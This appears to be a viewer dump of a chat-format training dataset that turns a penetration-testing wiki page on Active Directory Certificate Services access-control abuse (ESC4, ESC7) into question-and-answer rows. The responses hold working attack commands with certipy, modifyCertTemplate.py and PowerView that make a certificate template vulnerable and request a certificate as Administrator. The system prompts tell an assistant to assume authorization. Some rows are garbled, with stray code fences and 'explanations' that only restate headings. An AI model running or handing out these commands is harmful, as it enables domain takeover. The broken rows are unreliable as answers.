messages listlengths 3 3 | system stringclasses 3
values | user stringlengths 12 322 | response stringlengths 9 2k | metadata unknown |
|---|---|---|---|---|
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe Access cont... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe Access controls - Theory in the context of penetration testing | In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).
Active Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This in... | {
"corpus_index": 0,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through Access controls - Theory | In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).
Active Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This in... | {
"corpus_index": 0,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What is Access contr... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What is Access controls - Practice? | > [!TIP]
>
> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the... | {
"corpus_index": 1,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do Access controls - Practice | > [!TIP]
>
> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the... | {
"corpus_index": 1,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain Access contr... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain Access controls - Certificate templates (ESC4) | In order to obtain an abusable template, some attributes and parameters need to be properly setup
1. Get Enrollment rights for the vulnerable template
2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval
3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requi... | {
"corpus_index": 2,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute Access controls - Certificate templates (ESC4)? | In order to obtain an abusable template, some attributes and parameters need to be properly setup
1. Get Enrollment rights for the vulnerable template
2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval
3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requi... | {
"corpus_index": 2,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain 1. Save the ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain 1. Save the old configuration, edit the template and make it vulnerable | certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-default-configuration | {
"corpus_index": 3,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through 1. Save the old configuration, edit the template and make it vulnerable | certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-default-configuration | {
"corpus_index": 3,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe 2. Request ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe 2. Request a template certificate with a custom SAN in the context of penetration testing | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | {
"corpus_index": 4,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through 2. Request a template certificate with a custom SAN | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | {
"corpus_index": 4,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What should I know a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What should I know about 3. After the attack, restore the original configuration? | certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-configuration "$ESC4_TEMPLATE_NAME.json" -no-save
``
If a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.
``bash | {
"corpus_index": 5,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Give me a guide on 3. After the attack, restore the original configuration | certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-configuration "$ESC4_TEMPLATE_NAME.json" -no-save
``
If a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.
``bash | {
"corpus_index": 5,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "How do I use If for 3. af... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | How do I use If for 3. after the attack, restore the original configuration? | If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template. | {
"corpus_index": 6,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "If"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform 3. After the attack, restore the original configuration? | If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template. | {
"corpus_index": 6,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.`? | This command is used for 3. after the attack, restore the original configuration. 3. After the attack, restore the original configuration | {
"corpus_index": 6,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What is 1. Disable M... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What is 1. Disable Manager Approval Requirement? | modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 7,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute 1. Disable Manager Approval Requirement? | modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 7,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain 2. Disable A... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain 2. Disable Authorized Signature Requirement | modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 8,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform 2. Disable Authorized Signature Requirement? | modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 8,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What should I know a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What should I know about 3. Enable SAN Specification? | modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property "msPKI-Certificate-Name-Flag" "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 9,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute 3. Enable SAN Specification? | modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property "msPKI-Certificate-Name-Flag" "$DOMAIN/$USER:$PASSWORD" | {
"corpus_index": 9,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe 4. Edit Cer... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe 4. Edit Certificate Application Policy Extension in the context of penetration testing | modifyCertTemplate.py -template templateName -value "'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'" -property "pKIExtendedKeyUsage" "$DOMAIN/$USER:$PASSWORD"
``
> [!TIP]
> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.... | {
"corpus_index": 10,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Give me a guide on 4. Edit Certificate Application Policy Extension | modifyCertTemplate.py -template templateName -value "'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'" -property "pKIExtendedKeyUsage" "$DOMAIN/$USER:$PASSWORD"
``
> [!TIP]
> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.... | {
"corpus_index": 10,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute 4. Edit Certificate Application Policy Extension? | > [!TIP]
> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.
=== Windows
From Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate these sensitive access contro... | {
"corpus_index": 11,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `> [!TIP]`? | This command is used for 4. edit certificate application policy extension. 4. Edit Certificate Application Policy Extension | {
"corpus_index": 11,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Tell me about 2. Dis... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Tell me about 2. Disable Manager Approval Requirement | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose | {
"corpus_index": 12,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do 2. Disable Manager Approval Requirement | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose | {
"corpus_index": 12,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of 3. Disable Authorized Signature Requirement | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose | {
"corpus_index": 13,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform 3. Disable Authorized Signature Requirement? | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose | {
"corpus_index": 13,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of 4. Enable SAN Specification | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose | {
"corpus_index": 14,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | What are the steps for 4. Enable SAN Specification? | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose | {
"corpus_index": 14,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe 5. Edit Cer... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe 5. Edit Certificate Application Policy Extension in the context of penetration testing | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
```
:::
> [!WARNING]
>
> If sensitive access entries are identified, creativity will be the... | {
"corpus_index": 15,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Give me a guide on 5. Edit Certificate Application Policy Extension | Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
```
:::
> [!WARNING]
>
> If sensitive access entries are identified, creativity will be the... | {
"corpus_index": 15,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "How does Access cont... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | How does Access controls - Certificate Authority (ESC7) work? | There are two attacks paths for this scenario:
1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that
2. Alternatively, if an attacke... | {
"corpus_index": 16,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do Access controls - Certificate Authority (ESC7) | There are two attacks paths for this scenario:
1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that
2. Alternatively, if an attacke... | {
"corpus_index": 16,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain Access contr... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain Access controls - ESC7 - Exposing to ESC6 | If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).
::: tabs
=== UNIX-like
The attack can be ca... | {
"corpus_index": 17,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute Access controls - ESC7 - Exposing to ESC6? | If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).
::: tabs
=== UNIX-like
The attack can be ca... | {
"corpus_index": 17,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of query flags | reg.py "$DOMAIN"/"$USER":"$PASSWORD"@$"ADCS_IP" query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy' -v editflags | {
"corpus_index": 18,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
